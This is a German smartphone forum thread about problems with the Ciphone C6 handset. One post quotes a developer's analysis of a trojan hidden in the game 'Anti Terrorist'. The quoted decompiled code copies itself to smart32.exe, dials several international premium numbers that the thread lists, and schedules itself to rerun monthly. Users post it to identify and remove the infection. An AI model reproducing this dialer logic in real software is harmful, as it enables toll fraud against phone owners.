1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen

Probleme mit dem C6 hier rein

Dieses Thema im Forum "Allgemeine Infos und Fragen" wurde erstellt von ppkoeller, 18. November 2009.

  1. TedPsycho
    Offline

    TedPsycho New Member

    Registriert seit:
    3. November 2009
    Beiträge:
    71
    Danke:
    0
    Handy:
    3GS 2/8GB (neu)
    HTC Touch (Zweitgerät)
    Nokia E51 (@work)
    XDA Mini S (verkauft)
    Halli Hallo,

    ich bin irgendwie auf dem Holzweg. Bei Shoot Em komm ich irgendwie nicht mehr raus und in die AppleUI. Wenn ich auf den Knopf unten drücke komme ich aus jeder Anwendung ja raus, nur da nicht. Dazu kommt noch, dass die Auflösung verzerrt ist. Alle andere Programme laufen ohne Probleme, nur das nicht. Welche Version bzw. Auflösung habt ihr denn von Shoot EM?

    Danke

    Grüsse DaTeddy
     
    Zuletzt bearbeitet: 8. April 2010
  2. Dahmer
    Offline

    Dahmer Persona non grata

    Registriert seit:
    4. November 2009
    Beiträge:
    3,506
    Danke:
    766
    Handy:
    Siemens C45
    frage mal den Petteri,der hatte ähnliche probleme
     
  3. Petteri
    Offline

    Petteri Well-Known Member

    Registriert seit:
    13. August 2009
    Beiträge:
    7,467
    Danke:
    132
    Handy:
    Originale:HTC M8, GALAXY Note 3
    Clones:Huawei Honor 6, ZOPO C7, ZP900
    Tablets: Acer Switch 10
    Servus, musst leider gaaaaanz lange den Homebutton drücken! Dann im Task Manager ausmachen! Die Auflösung kannst leider nicht ändern!
     
  4. TedPsycho
    Offline

    TedPsycho New Member

    Registriert seit:
    3. November 2009
    Beiträge:
    71
    Danke:
    0
    Handy:
    3GS 2/8GB (neu)
    HTC Touch (Zweitgerät)
    Nokia E51 (@work)
    XDA Mini S (verkauft)
    Dann is es doch so! Ok. Danke für die Antwort.
     
  5. Petteri
    Offline

    Petteri Well-Known Member

    Registriert seit:
    13. August 2009
    Beiträge:
    7,467
    Danke:
    132
    Handy:
    Originale:HTC M8, GALAXY Note 3
    Clones:Huawei Honor 6, ZOPO C7, ZP900
    Tablets: Acer Switch 10
    Gern geschehen! Auch wenns keine große Hilfe war!
     
  6. Klodie
    Offline

    Klodie New Member

    Registriert seit:
    21. September 2009
    Beiträge:
    67
    Danke:
    0
    Handy:
    CETC i9, V709, C6 in erwartung !
    Hallo zusammen !
    Mein C6 hat sich letzte Nacht selbstständig gemacht. Es hat einfach 3 Auslandstelefonnummern gewählt, wobei unter einer Nummer 27 min. telefoniert wurde.
    Während bei uns alle geschlafen haben. Alles ziemlich seltsam.
    Hatte jemand von euch schon mal das gleiche problem?
    Kann das ganze auch von einem Virus oder einem Programm verursacht worden sein?
     
  7. carsten
    Offline

    carsten New Member

    Registriert seit:
    23. Dezember 2009
    Beiträge:
    27
    Danke:
    0
    Handy:
    Ciphone C6

    Hallo,

    die Nummern waren nicht zufällig:

    02524 221601
    +88213213214
    +1(767) 503-3611
    +882346077 ????

    MfG
    Carsten
     
  8. Klodie
    Offline

    Klodie New Member

    Registriert seit:
    21. September 2009
    Beiträge:
    67
    Danke:
    0
    Handy:
    CETC i9, V709, C6 in erwartung !
    Hallo Carsten !
    Ja das sind genau die Nummern.
    Woher kommt das?
    Macht das ein Programm oder was ist das, wie kann ich das abstellen?
    Habe es direkt heute bei Base gemeldet.
    Was soll ich dagegen tun?
     
  9. Petteri
    Offline

    Petteri Well-Known Member

    Registriert seit:
    13. August 2009
    Beiträge:
    7,467
    Danke:
    132
    Handy:
    Originale:HTC M8, GALAXY Note 3
    Clones:Huawei Honor 6, ZOPO C7, ZP900
    Tablets: Acer Switch 10
    Ja das interessiert uns jetzt wohl ALLE!

    Soll ja laut den XDAlern ein Trojaner sein.....
     
    Zuletzt bearbeitet: 9. April 2010
  10. Dahmer
    Offline

    Dahmer Persona non grata

    Registriert seit:
    4. November 2009
    Beiträge:
    3,506
    Danke:
    766
    Handy:
    Siemens C45
    war das nicht mit diesem 3d anti terrorist spiel oder hab ich das woanders gelesen
     
  11. Petteri
    Offline

    Petteri Well-Known Member

    Registriert seit:
    13. August 2009
    Beiträge:
    7,467
    Danke:
    132
    Handy:
    Originale:HTC M8, GALAXY Note 3
    Clones:Huawei Honor 6, ZOPO C7, ZP900
    Tablets: Acer Switch 10
    Ja dsa hab ich auch gelesen.....

    Hier: Übeltäter scheint tatsächlich das Spiel Anti Terrorist zu sein. Funktioniert nach einem Eintrag bei den Dev´s von leTama wie folgt:

    I took a quick look at the game, here is what I found:

    There is a reg.exe file installed (dotnet application), it copies itself to smart32.exe in windows directory and then does this:

    Phone phone = new Phone();
    phone.Talk("+8823460777");
    Thread.Sleep(0xc350);
    phone.Talk("+17675033611");
    Thread.Sleep(0xc350);
    phone.Talk("+88213213214");
    Thread.Sleep(0xc350);
    phone.Talk("+25240221601");
    Thread.Sleep(0xc350);
    phone.Talk("+2392283261");
    Thread.Sleep(0xc350);
    phone.Talk("+881842011123");
    long num6 = DateTime.Now.AddMonths(1).ToFileTime();
    long num7 = 0L;
    FileTimeToLocalFileTime(ref num6, ref num7);
    SystemTime time6 = new SystemTime();
    FileTimeToSystemTime(ref num7, time6);
    CeRunAppAtTime(@"\Windows\smart32.exe", time6);

    Definitely the culprit.

    LeTama
    [/I]__________________
    Diamond (LeTama-UC7)
    Elf (LeTama-21159.2)
    Leo (LeTama-1.66-4)


    Schaut also, ob Ihr die smart32.exe im windows - Verzeichnis habt. Unklar allerdings noch, ob auch andere Programme auf diese Datei zugreifen. Anscheinend nicht, aber sicher sind die dev´s sich noch nicht ...
     
  12. Dahmer
    Offline

    Dahmer Persona non grata

    Registriert seit:
    4. November 2009
    Beiträge:
    3,506
    Danke:
    766
    Handy:
    Siemens C45
  13. Klodie
    Offline

    Klodie New Member

    Registriert seit:
    21. September 2009
    Beiträge:
    67
    Danke:
    0
    Handy:
    CETC i9, V709, C6 in erwartung !
    Hallo genau das wars !
    Habe vorgestern das Spiel Anti Terrorist installiert.
    Letzte Nacht hatte es sich ja selbsständig gemacht.
    jetzt habe ich das Spiel sofort deinstalliert, die Datei smart32.exe gelöscht und werde heute abend noch ein Hardresset durchführen. Die Auslandstelefonnummern von Base sperren lassen.
    Und hoffe das es damit genug ist.
     
  14. wortart
    Offline

    wortart New Member

    Registriert seit:
    15. März 2010
    Beiträge:
    3
    Danke:
    0
    Handy:
    C6
    Hallo zusammen,

    viele Programme benötigen ja ein aktuelles framework pack. Leider kann ich das nicht auf meinem C6 installieren. Ich lade die Datei runter, führe sie auf dem pc aus. Als nächstes wähle ich die sd karte als installationsort. nun wird auf meinem handy angezeigt, dass die cab installiert wird und nach kurzer zeit kommt "Installation fehlgeschlagen"

    ist dieses Problem bekannt?

    Danke und Gruß
    wortart
     
  15. Petteri
    Offline

    Petteri Well-Known Member

    Registriert seit:
    13. August 2009
    Beiträge:
    7,467
    Danke:
    132
    Handy:
    Originale:HTC M8, GALAXY Note 3
    Clones:Huawei Honor 6, ZOPO C7, ZP900
    Tablets: Acer Switch 10
    hast Du erst die alte deinstalliert? Solltest Du vorher machen, es gibt auch eine cab Version, die kannst Du vom Handy aus installieren!
     
  16. wortart
    Offline

    wortart New Member

    Registriert seit:
    15. März 2010
    Beiträge:
    3
    Danke:
    0
    Handy:
    C6
    Danke schon mal...werde mir mal die cab version suchen!
    wie deinstalliere ich denn die alte version?

    Danke im Voraus
    Gruß
    wortart
     
  17. wortart
    Offline

    wortart New Member

    Registriert seit:
    15. März 2010
    Beiträge:
    3
    Danke:
    0
    Handy:
    C6
    cab installation hat geklappt, danke für den tip.
    hab nun noch eine angelegenheit:

    als ich mein c6 bekommen habe gingen vorinstallierte programme wie r66, caveman und co, nicht. bei r66 kommt ne fehlermeldung, dass programm wäre nicht istalliert.

    hatte jemand schonmal dieses problem?
     
  18. Dahmer
    Offline

    Dahmer Persona non grata

    Registriert seit:
    4. November 2009
    Beiträge:
    3,506
    Danke:
    766
    Handy:
    Siemens C45
    das ist normal,zumindest bei den vorinstallierten spielen,das sind nur blickfänger
     
  19. zeroooo
    Offline

    zeroooo New Member

    Registriert seit:
    26. März 2009
    Beiträge:
    95
    Danke:
    0
    Handy:
    Ciphone C6a
    hab ne frage zu den wetter apps

    wenn ich mir da eins downloade und installier

    holt dass dann die infos für mich kostenpflichtig ausm internet ?

    oder holt des nur wenn ich wlan hab

    und zeigt des dann auch an wenn ich z.b. heute ins internet mit dem handy geh und das wetter teil updated und ich geh halt dann am tag dancah nich ins internet mit dem c6 passen die angaben dann noch oder is des dann eifnach weg ?

    also so wetter vorhersage mäßig
     
  20. wüstenhaini
    Offline

    wüstenhaini Member

    Registriert seit:
    16. Januar 2010
    Beiträge:
    156
    Danke:
    3
    Handy:
    C6A; Star A500; JIAYU G3; Newman K1; Doogee F3 Pro
    Bei G-Weather kostet es dich die normalen Gebühren für GPRS oder Edge, wie wenn Du mit dem Browser surfst. Wenn du am nächsten Tag das Programm öffnest, und keine neuen Daten holst, hast Du natürlich den Wertterstand vom Vortag bzw. von Deiner letzten aktualisierung.

    Gruß
    Dirk